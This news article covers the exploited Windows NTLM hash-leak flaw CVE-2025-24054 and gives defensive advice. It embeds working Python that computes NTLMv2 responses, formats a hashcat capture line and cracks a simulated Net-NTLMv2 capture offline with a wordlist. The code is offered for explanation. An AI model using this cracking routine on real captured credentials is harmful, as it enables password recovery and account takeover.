Critical Windows Authentication Flaw Exploited in Global Cyber Attacks


A recently patched Windows vulnerability, CVE-2025-24054, which leaks users' NTLM authentication hashes, has been actively exploited in targeted attacks against government and private organizations in Poland and Romania, security researchers revealed.

The vulnerability, which Microsoft patched in its March 2025 security update and classifies as an NTLM hash disclosure spoofing flaw, is triggered when a user interacts with a specially crafted malicious file: Windows silently initiates an NTLM authentication to an attacker-controlled server and hands over the user's NTLMv2 challenge-response, commonly called a Net-NTLMv2 hash. That value is not the account's password hash and cannot be passed directly, but an attacker can crack it offline to recover the password, or relay it to another service that still accepts NTLM, and then use the account to gain unauthorized access.
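What an attacker actually does with the leaked value is easier to see in code. The following Python is an added illustration written for this page, not code from the article, from Check Point or from Microsoft. It reimplements the NTLMv2 computation described in MS-NLMP on top of a pure-Python MD4 (hashlib's md4 is often missing on current OpenSSL builds), simulates the victim's reply to an attacker-controlled SMB server using constructed sample data (the user j.kowalski, the domain CORP, the password Spring2025!, both nonces and the timestamp are all made up), and then recovers the password offline by guessing against the captured NTProofStr. The hashcat mode-5600 line and the guessing loop are generic: they apply to any Net-NTLMv2 capture, not only to this CVE.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's 'md4' is frequently unavailable
    under OpenSSL 3, and an NT hash is MD4 of the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    # Rounds: (mix function, additive constant, per-step shifts, X[] word order)
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), range(16)),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = rol((a + fn(b, c, d) + X[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c   # rotate registers: next step works on d
        a, b, c, d = ((a + aa) & MASK32, (b + bb) & MASK32,
                      (c + cc) & MASK32, (d + dd) & MASK32)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This is what pass-the-hash needs
    and what a CVE-2025-24054 leak does NOT hand the attacker."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)), MS-NLMP 3.3.2."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"),
                    hashlib.md5).digest()


def av_pair(av_id: int, value: bytes) -> bytes:
    """One AV_PAIR of the target-info list: AvId, AvLen (both LE16), then the value."""
    return struct.pack("<HH", av_id, len(value)) + value


def build_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE (the 'blob'), MS-NLMP 2.2.2.7: RespType=1, HiRespType=1,
    6 reserved bytes, FILETIME, 8-byte client nonce, 4 reserved, AV pairs, 4 reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def nt_proof_str(ntowf2: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """The 16-byte NTProofStr that prefixes NtChallengeResponse; the blob follows it."""
    return hmac.new(ntowf2, server_challenge + blob, hashlib.md5).digest()


def simulate_leak():
    """Victim side: Windows answers the attacker's SMB CHALLENGE with an AUTHENTICATE
    message. All values here are constructed sample data, not a real capture."""
    user, domain, password = "j.kowalski", "CORP", "Spring2025!"
    server_challenge = bytes.fromhex("0123456789abcdef")   # chosen by the attacker's server
    client_challenge = bytes.fromhex("aaaaaaaaaaaaaaaa")   # victim's nonce (made up)
    timestamp = 0x01DBB0E0A1B2C3D4                        # arbitrary FILETIME
    target_info = av_pair(2, domain.encode("utf-16le")) + av_pair(0, b"")  # NbDomainName, EOL
    blob = build_blob(timestamp, client_challenge, target_info)
    proof = nt_proof_str(ntowf_v2(password, user, domain), server_challenge, blob)
    # The attacker's server sees exactly these five things and nothing else.
    return user, domain, server_challenge, proof, blob


def hashcat_line(user, domain, server_challenge, proof, blob) -> str:
    """hashcat mode 5600 / john netntlmv2 format, as Responder-style tools emit it."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(user, domain, server_challenge, proof, blob, wordlist):
    """Offline guessing: recompute NTProofStr per candidate; the victim is never contacted."""
    for candidate in wordlist:
        guess = nt_proof_str(ntowf_v2(candidate, user, domain), server_challenge, blob)
        if hmac.compare_digest(guess, proof):
            return candidate
    return None


if __name__ == "__main__":
    leak = simulate_leak()
    print(hashcat_line(*leak))
    print("recovered:", crack(*leak, ["letmein", "Spring2025!", "hunter2"]))
```

Note what is and is not leaked: the attacker's server sees the user name, the domain, its own server challenge, the 16-byte NTProofStr and the blob, never the NT hash, so the capture cannot be replayed later or used for pass-the-hash. It can be cracked offline at the attacker's leisure, as crack() shows, and while the connection is live it can be relayed to another service that accepts NTLM; that is why cutting off outbound SMB and retiring NTLM matter as much as the patch itself.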

According to Check Point Research, the first attacks leveraging this flaw began on March 19, 2025, just days after Microsoft released the patch. The campaigns used phishing emails that led victims to malicious archive files hosted on Dropbox in order to steal their credentials.

"The attackers carefully constructed phishing emails to trick targets into downloading attachments containing exploit files," explained Check Point researchers. "When victims downloaded and interacted with these files, their authentication credentials were automatically leaked to attacker-controlled servers."

The research team observed approximately 10 different attack campaigns between March 19-25, targeting organizations worldwide. The malicious servers collecting stolen credentials were traced to multiple countries including Russia, Bulgaria, Netherlands, Australia, and Turkey.

One of the IP addresses used in the attacks was previously linked to APT28, a threat group believed to be connected to Russian state-sponsored activities. However, researchers note there is currently insufficient evidence to definitively attribute these specific campaigns.

Microsoft has released patches for all supported Windows versions to address the vulnerability. Organizations still running older, unsupported Windows versions will not receive that fix and can turn to third-party micropatching as a stopgap.

Security experts recommend that organizations promptly apply the available patches and, because this is only the latest of many NTLM credential-leak bugs, reduce exposure to the whole class: block outbound SMB (TCP port 445) at the network perimeter so that a forced authentication never reaches an attacker's server, restrict outgoing NTLM traffic to remote servers through Group Policy, and plan a move away from NTLM authentication altogether, which Microsoft officially deprecated in 2024 in favor of Kerberos.

The rapid exploitation of this vulnerability highlights the need for organizations to quickly address security flaws, even those initially deemed lower risk. While not as severe as remote code execution bugs, credential theft vulnerabilities can still enable damaging network compromises when exploited by determined attackers.